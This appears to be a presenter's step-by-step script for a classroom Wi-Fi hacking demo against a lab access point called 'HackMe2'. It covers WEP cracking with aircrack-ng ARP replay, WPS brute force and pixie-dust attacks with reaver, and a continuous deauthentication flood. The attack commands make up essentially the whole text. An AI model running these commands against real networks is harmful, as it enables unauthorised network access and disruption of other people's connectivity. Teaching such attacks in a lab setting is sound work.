Part1: Start monitor mode on a particular interface and kill problematic services which may interfere: airmon-ng airmon-ng check kill airmon-ng start wlan1 Look for nearby APs: airodump-ng wlan1mon A0:04:60:A8:AE:68 WEP Scan particular AP. Will show hosts, and dump and packets to file HackMe2-01.cap airodump-ng --bssid A0:04:60:A8:AE:68 --channel 1 --write HackMe2 wlan1mon [Connect Phone to show client] [New Tab] Fake Authentication: aireplay-ng -1 0 -a A0:04:60:A8:AE:68 -e HackMe2 wlan1mon Use this command to wait for ARP from client, then repeat it to AP to collect packets aireplay-ng -3 -b A0:04:60:A8:AE:68 -h C0:EE:FB:27:F5:9E wlan1mon Backup: If not getting ARP in class, use previously captured ARP: aireplay -2 -r replay_arp-0302-225403.cap Stop after ~30k packets are collected, then: aircrack-ng HackMe2-01.cap Password DEADBEEF42 should display ================ Part 2: airodump output will show new WPA2 AP: A0:04:60:A8:AE:68 WPA2 CCMP PSK HackMe2 Scan for WPS-enabled APs: wash -i wlan1mon Attempt WPS bruteforce on the HackMe2 AP: reaver -i wlan1mon -b A0:04:60:A8:AE:68 -c 1 -vv -S Will become locked, which we can see if we use wash again ================ Part 3: [connect client so we can see it] Look at airodump to find client airodump-ng --bssid A0:04:60:A8:AE:68 --channel 1 wlan1mon Continuosuly deauth client: aireplay-ng -0 0 -a A0:04:60:A8:AE:68 -c C0:EE:FB:27:F5:9E wlan1mon [user restarts router] We can now check the WPS status again: wash -i wlan1mon [WPS now unlocked] ================ Part 4: Try pixiedust attack: reaver -i wlan1mon -b A0:04:60:A8:AE:68 -c 1 -vv -K 1 [Can see password "precisely"] Turn off monitor mode and restart network services airmon-ng stop wlan1mon service network-manager start service wpa_supplicant start